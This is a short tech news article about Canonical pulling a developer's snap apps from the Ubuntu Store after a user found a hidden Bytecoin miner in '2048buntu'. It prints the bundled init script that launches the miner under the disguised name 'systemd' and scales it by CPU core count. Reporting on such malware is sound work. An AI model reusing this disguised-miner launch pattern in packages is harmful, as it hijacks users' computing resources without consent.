This article is more than 1 year old
Ubuntu sends crypto-mining apps out of its store and into a tomb
Developer's dreams of driving off in a Ferrari dashed
Admins of the Ubuntu Store have pulled all apps from a developer who signed himself "Nicholas Tomb", and from his e-mail signature apparently wanted to crypto-mine himself into a Ferrari.
Mr Tomb's "2048buntu" and "Hextris" applications are now absent from the store, with their removal sparked by a GitHub comment about the 2048buntu. User Tarwirdur wrote “This application contains hidden сrypto-currency miner inside” (it was mining Bytecoin) and asked how this could be reported.
Here's the code Tarwirdur spotted (look for the e-mail sig in the seventh line):
squashfs-root/systemd - miner
squashfs-root/start - init script:
#!/bin/bash
currency=bcn
name=2048buntu
{ # try
/snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1 -g
} || { # catch
cores=($(grep -c ^processor /proc/cpuinfo))
if (( $cores < 4 )); then
/snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1
else
/snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 2
fi
}
Canonical's Adam Collard responded “yes, we've removed all applications from this author pending further investigations. Thank you for your vigilance!”
The apps were created using Ubuntu's "Snaps" tool, which packages code so that all their dependencies ride along, and install with an auto-updater. Canonical created Snaps to try and simplify package deployment on Linux distributions.
Apps with ride-along miners are hard to spot: even the likes of Google and Apple, which both have cash and people galore, miss malicious apps from time to time. The far-smaller Canonical has the advantage of open sourcery providing an army of crook-code-detectors. ®
Biting the hand that feeds IT
